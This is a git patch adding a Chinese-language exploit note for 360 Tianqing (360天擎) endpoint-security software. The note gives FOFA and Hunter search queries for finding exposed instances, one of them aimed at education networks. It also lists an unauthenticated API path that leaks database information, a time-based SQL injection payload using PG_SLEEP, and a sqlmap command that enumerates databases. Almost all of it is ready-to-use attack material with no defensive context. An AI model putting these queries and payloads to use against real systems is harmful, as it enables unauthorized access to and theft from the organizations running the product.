From 80bc9aeea9f05724cdf13d24e50d4410ffddad1f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 18 Oct 2023 18:38:23 +0800
Subject: [PATCH] =?UTF-8?q?Create=20360=E5=A4=A9=E6=93=8E=20-=20=E6=9C=AA?=
 =?UTF-8?q?=E6=8E=88=E6=9D=83=E4=B8=8Esql=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 360天擎 - 未授权与sql注入.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 360天擎 - 未授权与sql注入.md

diff --git a/360天擎 - 未授权与sql注入.md b/360天擎 - 未授权与sql注入.md
new file mode 100644
index 0000000..7794664
--- /dev/null
+++ b/360天擎 - 未授权与sql注入.md	
@@ -0,0 +1,24 @@
+## 360天擎 - 未授权与sql注入
+
+## FOFA语法
+```title="360新天擎"```
+
+
+## 鹰图
+```web.title="360新天擎"&& ip.isp="教育"```
+
+## 漏洞复现
+
+### 未授权漏洞
+```路由后拼接/api/dbstat/gettablessize```
+
+
+### sql注入漏洞
+比较推荐的方式先测试是否存在数据库信息泄露，存在的话大概率存在SQL注入
+```
+路由后拼接/api/dp/rptsvcsyncpoint?ccid=1
+
+{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
+```
+## sqlmap
+python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1